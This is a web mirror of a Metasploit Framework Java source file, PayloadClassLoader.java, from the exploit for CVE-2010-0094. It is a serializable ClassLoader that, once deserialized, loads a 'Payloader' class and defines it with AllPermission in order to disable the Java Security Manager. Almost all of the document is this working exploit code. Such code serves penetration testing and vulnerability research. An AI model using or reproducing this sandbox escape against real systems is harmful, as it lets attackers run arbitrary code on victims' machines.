CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2010-0094/PayloadClassLoader.java
Views: 11780
1
import java.io.ByteArrayOutputStream;

2
import java.io.IOException;

3
import java.io.InputStream;

4
import java.io.ObjectInputStream;

5
import java.io.ObjectOutputStream;

6
import java.io.Serializable;

7
import java.net.URL;

8
import java.security.AllPermission;

9
import java.security.CodeSource;

10
import java.security.Permissions;

11
import java.security.ProtectionDomain;

12
import java.security.cert.Certificate;

13


14
/**

15
 * This class is a classloader and loads our Payloader class that disables the

16
 * Security Manager

17
 * 

18
 * @author mka

19
 * 

20
 */

21
public class PayloadClassLoader extends ClassLoader implements Serializable {

22


23
	private static final long serialVersionUID = -7072212342699783162L;

24
	public static PayloadClassLoader instance = null;

25


26
	private void writeObject(ObjectOutputStream paramObjectOutputStream)

27
			throws IOException, ClassNotFoundException {

28
		paramObjectOutputStream.defaultWriteObject();

29
	}

30


31
	private void readObject(ObjectInputStream paramObjectInputStream)

32
			throws IOException, ClassNotFoundException {

33
		instance = this;

34
		paramObjectInputStream.defaultReadObject();

35
	}

36


37
	public void loadIt() throws IOException, InstantiationException,

38
			IllegalAccessException {

39


40
		ByteArrayOutputStream localObject1;

41
		byte[] localObject2;

42
		InputStream localObject3;

43


44
		localObject1 = new ByteArrayOutputStream();

45
		localObject2 = new byte[8192];

46


47
		localObject3 = super.getClass().getResourceAsStream("/Payloader.class");

48
		int j;

49
		while ((j = (localObject3).read(localObject2)) > 0) {

50


51
			(localObject1).write(localObject2, 0, j);

52
		}

53
		localObject2 = (localObject1).toByteArray();

54


55
		URL localURL = new URL("file:///");

56
		Class localClass;

57


58
		Certificate[] arrayOfCertificate = new Certificate[0];

59


60
		Permissions localPermissions = new Permissions();

61
		localPermissions.add(new AllPermission());

62


63
		ProtectionDomain localProtectionDomain = new ProtectionDomain(

64
				new CodeSource(localURL, arrayOfCertificate), localPermissions);

65
		localClass = defineClass("Payloader", localObject2, 0,

66
				localObject2.length, localProtectionDomain);

67
		localClass.newInstance();

68


69
	}

70


71
}

72


73